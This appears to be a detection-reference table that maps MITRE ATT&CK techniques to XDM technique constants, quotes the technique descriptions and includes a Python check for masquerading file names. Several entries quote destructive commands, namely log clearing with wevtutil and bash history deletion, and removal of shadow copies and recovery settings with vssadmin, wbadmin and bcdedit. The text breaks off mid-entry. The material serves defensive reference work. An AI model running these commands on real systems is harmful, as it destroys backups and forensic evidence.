An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting (Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW),(Citation: Microsoft About Event Tracing 2018) by tampering with settings that control the collection and flow of event telemetry. (Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). ETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) Set-EtwTraceProvider cmdlet or by interfacing directly with the Registry to make alterations. In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products.
https://attack.mitre.org/techniques/T1562/006
T1562.009 XDM_CONST.MITRE_TECHNIQUE_IMPAIR_DEFENSES_SAFE_MODE_BOOT
Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019) Adversaries may abuse safe mode to disable endpoint defenses that may not start with a limited boot. Hosts can be forced into safe mode after the next reboot via modifications to Boot Configuration Data (BCD) stores, which are files that manage boot application settings.(Citation: Microsoft bcdedit 2021) Adversaries may also add their malicious applications to the list of minimal services that start in safe mode by modifying relevant Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)). Malicious [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) objects may also be registered and loaded in safe mode.(Citation: Sophos Snatch Ransomware 2019)(Citation: CyberArk Labs Safe Mode 2016)(Citation: Cybereason Nocturnus MedusaLocker 2020)(Citation: BleepingComputer REvil 2021)
https://attack.mitre.org/techniques/T1562/009
T1525 XDM_CONST.MITRE_TECHNIQUE_IMPLANT_INTERNAL_IMAGE
Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim's environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019) A tool has been developed to facilitate planting backdoors in cloud container images.(Citation: Rhino Labs Cloud Backdoor September 2019) If an attacker has access to a compromised AWS instance, and permissions to list the available container images, they may implant a backdoor such as a [Web Shell](https://attack.mitre.org/techniques/T1505/003).(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)
https://attack.mitre.org/techniques/T1525
T1070 XDM_CONST.MITRE_TECHNIQUE_INDICATOR_REMOVAL_ON_HOST
Adversaries may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware. Locations and format of logs are platform or product-specific, however standard operating system logs are captured as Windows events or Linux/macOS files such as [Bash History](https://attack.mitre.org/techniques/T1552/003) and /var/log/*. These actions may interfere with event collection, reporting, or other notifications used to detect intrusion activity. This may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred.
https://attack.mitre.org/techniques/T1070
T1070.003 XDM_CONST.MITRE_TECHNIQUE_INDICATOR_REMOVAL_ON_HOST_CLEAR_COMMAND_HISTORY
In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done. On Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The benefit of this is that it allows users to go back to commands they've used before in different sessions. Adversaries may delete their commands from these logs by manually clearing the history (history -c) or deleting the bash history file rm ~/.bash_history. On Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the PSReadLine module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends. The PSReadLine command history tracks the commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.(Citation: Microsoft PowerShell Command History) Adversaries may run the PowerShell command Clear-History to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the ConsoleHost_history.txt file. Adversaries may also delete the ConsoleHost_history.txt file or edit its contents to hide PowerShell commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)
https://attack.mitre.org/techniques/T1070/003
T1070.002 XDM_CONST.MITRE_TECHNIQUE_INDICATOR_REMOVAL_ON_HOST_CLEAR_LINUX_OR_MAC_SYSTEM_LOGS
Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the /var/log/ directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)
* /var/log/messages: General and system-related messages
* /var/log/secure or /var/log/auth.log: Authentication logs
* /var/log/utmp or /var/log/wtmp: Login records
* /var/log/kern.log: Kernel logs
* /var/log/cron.log: Crond logs
* /var/log/maillog: Mail server logs
* /var/log/httpd/: Web server access and error logs
https://attack.mitre.org/techniques/T1070/002
T1070.001 XDM_CONST.MITRE_TECHNIQUE_INDICATOR_REMOVAL_ON_HOST_CLEAR_WINDOWS_EVENT_LOGS
Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit. The event logs can be cleared with the following utility commands:
* wevtutil cl system
* wevtutil cl application
* wevtutil cl security
These logs may also be cleared through other mechanisms, such as the event viewer GUI or [PowerShell](https://attack.mitre.org/techniques/T1059/001).
https://attack.mitre.org/techniques/T1070/001
T1070.004 XDM_CONST.MITRE_TECHNIQUE_INDICATOR_REMOVAL_ON_HOST_FILE_DELETION
Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint. There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well. Examples include native [cmd](https://attack.mitre.org/software/S0106) functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools. (Citation: Trend Micro APT Attack Tools)
https://attack.mitre.org/techniques/T1070/004
T1070.005 XDM_CONST.MITRE_TECHNIQUE_INDICATOR_REMOVAL_ON_HOST_NETWORK_SHARE_CONNECTION_REMOVAL
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) connections can be removed when no longer needed. [Net](https://attack.mitre.org/software/S0039) is an example utility that can be used to remove network share connections with the net use \\system\share /delete command. (Citation: Technet Net Use)
https://attack.mitre.org/techniques/T1070/005
T1070.006 XDM_CONST.MITRE_TECHNIQUE_INDICATOR_REMOVAL_ON_HOST_TIMESTOMP
Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools. Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)
https://attack.mitre.org/techniques/T1070/006
T1202 XDM_CONST.MITRE_TECHNIQUE_INDIRECT_COMMAND_EXECUTION
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017) Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
https://attack.mitre.org/techniques/T1202
T1105 XDM_CONST.MITRE_TECHNIQUE_INGRESS_TOOL_TRANSFER
Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
https://attack.mitre.org/techniques/T1105
T1490 XDM_CONST.MITRE_TECHNIQUE_INHIBIT_SYSTEM_RECOVERY
Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) A number of native Windows utilities have been used by adversaries to disable or delete system recovery features:
* vssadmin.exe can be used to delete all volume shadow copies on a system - vssadmin.exe delete shadows /all /quiet
* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - wmic shadowcopy delete
* wbadmin.exe can be used to delete the Windows Backup Catalog - wbadmin.exe delete catalog -quiet
* bcdedit.exe can be used to disable automatic Windows recovery features by modifying boot configuration data - bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
https://attack.mitre.org/techniques/T1490
T1056 XDM_CONST.MITRE_TECHNIQUE_INPUT_CAPTURE
Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004)) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. [Web Portal Capture](https://attack.mitre.org/techniques/T1056/003)).
https://attack.mitre.org/techniques/T1056
T1056.004 XDM_CONST.MITRE_TECHNIQUE_INPUT_CAPTURE_CREDENTIAL_API_HOOKING
Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
* **Hook procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
* **Import address table (IAT) hooking**, which uses modifications to a process's IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
* **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
https://attack.mitre.org/techniques/T1056/004
T1056.002 XDM_CONST.MITRE_TECHNIQUE_INPUT_CAPTURE_GUI_INPUT_CAPTURE
Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need more privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)). Adversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware)(Citation: Spoofing credential dialogs) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015)(Citation: Spoofing credential dialogs) On Linux systems attackers may launch dialog boxes prompting users for credentials from malicious shell scripts or the command line (i.e. [Unix Shell](https://attack.mitre.org/techniques/T1059/004)).(Citation: Spoofing credential dialogs)
https://attack.mitre.org/techniques/T1056/002
T1056.001 XDM_CONST.MITRE_TECHNIQUE_INPUT_CAPTURE_KEYLOGGING
Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured. Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:
* Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data.
* Reading raw keystroke data from the hardware buffer.
* Windows Registry modifications.
* Custom drivers.
* [Modify System Image](https://attack.mitre.org/techniques/T1601) may provide adversaries with hooks into the operating system of network devices to read raw keystrokes for login sessions.(Citation: Cisco Blog Legacy Device Attacks)
https://attack.mitre.org/techniques/T1056/001
T1056.003 XDM_CONST.MITRE_TECHNIQUE_INPUT_CAPTURE_WEB_PORTAL_CAPTURE
Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service. This variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through [External Remote Services](https://attack.mitre.org/techniques/T1133) and [Valid Accounts](https://attack.mitre.org/techniques/T1078) or as part of the initial compromise by exploitation of the externally facing web service.(Citation: Volexity Virtual Private Keylogging)
https://attack.mitre.org/techniques/T1056/003
T1559 XDM_CONST.MITRE_TECHNIQUE_INTER_PROCESS_COMMUNICATION
Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occur when processes are stuck in a cyclic waiting pattern. Adversaries may abuse IPC to execute arbitrary code or commands. IPC mechanisms may differ depending on OS, but typically exist in a form accessible through programming languages/libraries or native interfaces such as Windows [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) or [Component Object Model](https://attack.mitre.org/techniques/T1559/001). Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s, may also leverage underlying IPC mechanisms. Adversaries may also use [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) to facilitate remote IPC execution.(Citation: Fireeye Hunting COM June 2019)
https://attack.mitre.org/techniques/T1559
T1559.001 XDM_CONST.MITRE_TECHNIQUE_INTER_PROCESS_COMMUNICATION_COMPONENT_OBJECT_MODEL
Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) Remote COM execution is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019) Various COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).(Citation: Microsoft COM) Specific COM objects also exist to directly perform functions beyond code execution, such as creating a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), fileless download/execution, and other adversary behaviors related to privilege escalation and persistence.(Citation: Fireeye Hunting COM June 2019)(Citation: ProjectZero File Write EoP Apr 2018)
https://attack.mitre.org/techniques/T1559/001
T1559.002 XDM_CONST.MITRE_TECHNIQUE_INTER_PROCESS_COMMUNICATION_DYNAMIC_DATA_EXCHANGE
Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution. Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by [Component Object Model](https://attack.mitre.org/techniques/T1559/001), DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys. (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: Microsoft ADV170021 Dec 2017) (Citation: Microsoft DDE Advisory Nov 2017) Microsoft Office documents can be poisoned with DDE commands (Citation: SensePost PS DDE May 2016) (Citation: Kettle CSV DDE Aug 2014), directly or through embedded files (Citation: Enigma Reviving DDE Jan 2018), and used to deliver execution via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros. (Citation: SensePost MacroLess DDE Oct 2017) DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). DDE execution can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)
https://attack.mitre.org/techniques/T1559/002
T1534 XDM_CONST.MITRE_TECHNIQUE_INTERNAL_SPEARPHISHING Adversaries may use internal spearphishing to gain access to additional information or exploit other users
within the same organization after they already have access to accounts or systems within the environment.
Internal spearphishing is a multi-staged attack where an email account is owned either by controlling the
user's device with previously installed malware or by compromising the account credentials of the user.
Adversaries attempt to take advantage of a trusted internal account to increase the likelihood of tricking the
target into falling for the phish attempt.(Citation: Trend Micro When Phishing Starts from the Inside 2017)
Adversaries may leverage [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) or
[Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) as part of internal spearphishing to
deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://
attack.mitre.org/techniques/T1056) on sites that mimic email login interfaces. There have been notable
incidents where internal spearphishing has been used. The Eye Pyramid campaign used phishing emails
with malicious attachments for lateral movement between victims, compromising nearly 18,000 email
accounts in the process.(Citation: Trend Micro When Phishing Starts from the Inside 2017) The Syrian
Electronic Army (SEA) compromised email accounts at the Financial Times (FT) to steal additional account
credentials. Once FT learned of the attack and began warning employees of the threat, the SEA sent
phishing emails mimicking the Financial Times IT department and were able to compromise even more
users.(Citation: THE FINANCIAL TIMES LTD 2019.) https://attack.mitre.org/techniques/T1534
T1570 XDM_CONST.MITRE_TECHNIQUE_LATERAL_TOOL_TRANSFER Adversaries may transfer tools or other files between systems in a compromised environment. Files may be
copied from one system to another to stage adversary tools or other files over the course of an operation.
Adversaries may copy files laterally between internal victim systems to support lateral movement using
inherent file sharing protocols such as file sharing over SMB to connected network shares or with
authenticated connections with [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/
T1021/002) or [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001). Files can also be
copied over on Mac and Linux with native tools like scp, rsync, and sftp. https://attack.mitre.org/techniques/
T1570
T1036 XDM_CONST.MITRE_TECHNIQUE_MASQUERADING Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign
to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or
malicious, is manipulated or abused for the sake of evading defenses and observation. This may include
manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or
service names. Renaming abusable system utilities to evade security monitoring is also a form of
[Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site) https://
attack.mitre.org/techniques/T1036
Original Mapped Description
T1036.007 XDM_CONST.MITRE_TECHNIQUE_MASQUERADING_DOUBLE_FILE_EXTENSION Adversaries may abuse a double extension in the filename as a means of masquerading the true file type.
A file name may include a secondary file type extension that may cause only the first extension to be
displayed (ex: File.txt.exe may render in some views as just File.txt). However, the second extension
is the true file type that determines how the file is opened and executed. The real file extension may be
hidden by the operating system in the file browser (ex: explorer.exe), as well as in any software configured
using or similar to the system’s policies.(Citation: PCMag DoubleExtension)(Citation: SOCPrime
DoubleExtension) Adversaries may abuse double extensions to attempt to conceal dangerous file types of
payloads. A very common usage involves tricking a user into opening what they think is a benign file type
but is actually executable code. Such files often pose as email attachments and allow an adversary to gain
[Initial Access](https://attack.mitre.org/tactics/TA0001) into a user’s system via [Spearphishing Attachment]
(https://attack.mitre.org/techniques/T1566/001) then [User Execution](https://attack.mitre.org/techniques/
T1204). For example, an executable file attachment named Evil.txt.exe may display as Evil.txt to a
user. The user may then view it as a benign text file and open it, inadvertently executing the hidden
malware.(Citation: SOCPrime DoubleExtension) Common file types, such as text files (.txt, .doc, etc.) and
image files (.jpg, .gif, etc.) are typically used as the first extension to appear benign. Executable extensions
commonly regarded as dangerous, such as .exe, .lnk, .hta, and .scr, often appear as the second extension
and true file type. https://attack.mitre.org/techniques/T1036/007
T1036.001 XDM_CONST.MITRE_TECHNIQUE_MASQUERADING_INVALID_CODE_SIGNATURE Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a
user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a
guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature
information from a signed program, then use it as a template for an unsigned program. Files with invalid
code signatures will fail digital signature validation checks, but they may appear more legitimate to users
and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017) Unlike [Code
Signing](https://attack.mitre.org/techniques/T1553/002), this activity will not result in a valid signature.
https://attack.mitre.org/techniques/T1036/001
T1036.004 XDM_CONST.MITRE_TECHNIQUE_MASQUERADING_MASQUERADE_TASK_OR_SERVICE Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or
benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or
description.(Citation: TechNet Schtasks)(Citation: Systemd Service Units) Windows services will have a
service name as well as a display name. Many benign tasks and services exist that have commonly
associated names. Adversaries may give tasks or services names that are similar or identical to those of
legitimate ones. Tasks or services contain other fields, such as a description, that adversaries may attempt
to make appear legitimate.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Fysbis Dr Web Analysis)
https://attack.mitre.org/techniques/T1036/004
T1036.005 XDM_CONST.MITRE_TECHNIQUE_MASQUERADING_MATCH_LEGITIMATE_NAME_OR_LOCATION Adversaries may match or approximate the name or location of legitimate files or resources when naming/
placing them. This is done for the sake of evading defenses and observation. This may be done by placing
an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate,
trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a
resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a
file or container image name given may be a close approximation to legitimate programs/images or
something innocuous. Adversaries may also use the same icon of the file they are trying to mimic. https://
attack.mitre.org/techniques/T1036/005
T1036.003 XDM_CONST.MITRE_TECHNIQUE_MASQUERADING_RENAME_SYSTEM_UTILITIES Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the
usage of those utilities. Security monitoring and control mechanisms may be in place for system utilities
adversaries are capable of abusing. (Citation: LOLBAS Main Site) It may be possible to bypass those
security mechanisms by renaming the utility prior to utilization (ex: rename rundll32.exe). (Citation:
Elastic Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a
different directory and renamed to avoid detections based on system utilities executing from non-standard
paths. (Citation: F-Secure CozyDuke) https://attack.mitre.org/techniques/T1036/003
T1036.002 XDM_CONST.MITRE_TECHNIQUE_MASQUERADING_RIGHT_TO_LEFT_OVERRIDE Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string
and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text
that follows it to be displayed in reverse. For example, a Windows screensaver executable named March
25 \u202Excod.scr will display as March 25 rcs.docx. A JavaScript file named
photo_high_re\u202Egnp.js will be displayed as photo_high_resj.png.(Citation: Infosecinstitute RTLO
Technique) Adversaries may abuse the RTLO character as a means of tricking a user into executing what
they think is a benign file type. A common use of this technique is with [Spearphishing Attachment](https://
attack.mitre.org/techniques/T1566/001)/[Malicious File](https://attack.mitre.org/techniques/T1204/002)
since it can trick both end users and defenders if they are not aware of how their tools display and render
the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and
criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can
be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the
command line tool reg.exe does not by default. https://attack.mitre.org/techniques/T1036/002
T1036.006 XDM_CONST.MITRE_TECHNIQUE_MASQUERADING_SPACE_AFTER_FILENAME Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types
(specifically this does not work with .app extensions), appending a space to the end of a filename will
change how the file is processed by the operating system. For example, if there is a Mach-O executable file
called evil.bin, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is
renamed to evil.txt, then when double clicked by a user, it will launch with the default text editing
application (not executing the binary). However, if the file is renamed to evil.txt with a single trailing space
after the extension (easy to miss in a file listing), then when double clicked by a user, the true file type is determined by the OS and handled
appropriately and the binary will be executed (Citation: Mac Backdoors are back). Adversaries can use this
feature to trick users into double clicking benign-looking files of any format and ultimately executing
something malicious. https://attack.mitre.org/techniques/T1036/006
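The three filename tricks described above (the RTLO character of T1036.002, the trailing space of T1036.006 and the double extension of T1036.007) can be checked by the same piece of logic. The following is an added example, not XSIAM code and not part of this schema: it classifies a file name, returns the page's XDM_CONST.MITRE_TECHNIQUE constant for the first trick it finds, and shows what a renderer that honours U+202E would display. The extension lists, the .app exclusion and the sample names are assumptions constructed for the example.

```python
"""Classify file names against the masquerading sub-techniques T1036.002/.006/.007."""
from typing import Optional

RTLO = "\u202e"  # right-to-left override, T1036.002

# Assumed lists, built from the extensions the descriptions above call out.
EXECUTABLE_EXTS = {"exe", "lnk", "hta", "scr", "js", "vbs", "bat", "cmd", "ps1", "dll"}
BENIGN_EXTS = {"txt", "doc", "docx", "pdf", "jpg", "jpeg", "gif", "png", "csv"}

T_RTLO = "XDM_CONST.MITRE_TECHNIQUE_MASQUERADING_RIGHT_TO_LEFT_OVERRIDE"
T_SPACE = "XDM_CONST.MITRE_TECHNIQUE_MASQUERADING_SPACE_AFTER_FILENAME"
T_DOUBLE = "XDM_CONST.MITRE_TECHNIQUE_MASQUERADING_DOUBLE_FILE_EXTENSION"


def rendered_name(name: str) -> str:
    """What a renderer that honours U+202E shows: everything after the override is reversed."""
    if RTLO not in name:
        return name
    head, tail = name.split(RTLO, 1)
    return head + tail[::-1]


def classify_filename(name: str) -> Optional[str]:
    """Return the technique constant for the first masquerading trick found, else None."""
    # T1036.002: the RTLO character has no legitimate use inside a file name.
    if RTLO in name:
        return T_RTLO
    # T1036.006: trailing space after the extension. The description notes the trick
    # does not work with .app bundles, so those are not flagged (assumption).
    stripped = name.rstrip(" ")
    if stripped != name and not stripped.lower().endswith(".app"):
        return T_SPACE
    # T1036.007: a benign-looking extension immediately before an executable one.
    parts = name.lower().split(".")
    if len(parts) >= 3 and parts[-1] in EXECUTABLE_EXTS and parts[-2] in BENIGN_EXTS:
        return T_DOUBLE
    return None


if __name__ == "__main__":
    # Constructed sample names, including the two the RTLO description uses.
    for sample in ["March 25 \u202excod.scr", "photo_high_re\u202egnp.js",
                   "Evil.txt.exe", "evil.txt ", "report.docx"]:
        print(repr(sample), "renders as", repr(rendered_name(sample)),
              "->", classify_filename(sample))
```

The checks are ordered so that the unambiguous signal (an RTLO byte) wins over the heuristic ones; a real detection would run the classifier over xdm.target.file.filename and attach the returned constant to the alert's technique field.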
T1556 XDM_CONST.MITRE_TECHNIQUE_MODIFY_AUTHENTICATION_PROCESS Adversaries may modify authentication mechanisms and processes to access user credentials or enable
otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as
the Local Security Authority Subsystem Service (LSASS) process and the Security Accounts Manager (SAM) on
Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on
MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an
authentication process, an adversary may be able to authenticate to a service or system without using
[Valid Accounts](https://attack.mitre.org/techniques/T1078). Adversaries may maliciously modify a part of
this process to either reveal credentials or bypass authentication mechanisms. Compromised credentials or
access may be used to bypass access controls placed on various resources on systems within the network
and may even be used for persistent access to remote systems and externally available services, such as
VPNs, Outlook Web Access and remote desktop. https://attack.mitre.org/techniques/T1556
T1556.001 XDM_CONST.MITRE_TECHNIQUE_MODIFY_AUTHENTICATION_PROCESS_DOMAIN_CONTROLLER_AUTHENTICATION Adversaries may patch the authentication process on a domain controller to bypass the typical
authentication mechanisms and enable access to accounts. Malware may be used to inject false
credentials into the authentication process on a domain controller with the intent of creating a backdoor
used to access any user’s account and/or credentials (ex: [Skeleton Key](https://attack.mitre.org/software/
S0007)). Skeleton key works through a patch on an enterprise domain controller authentication process
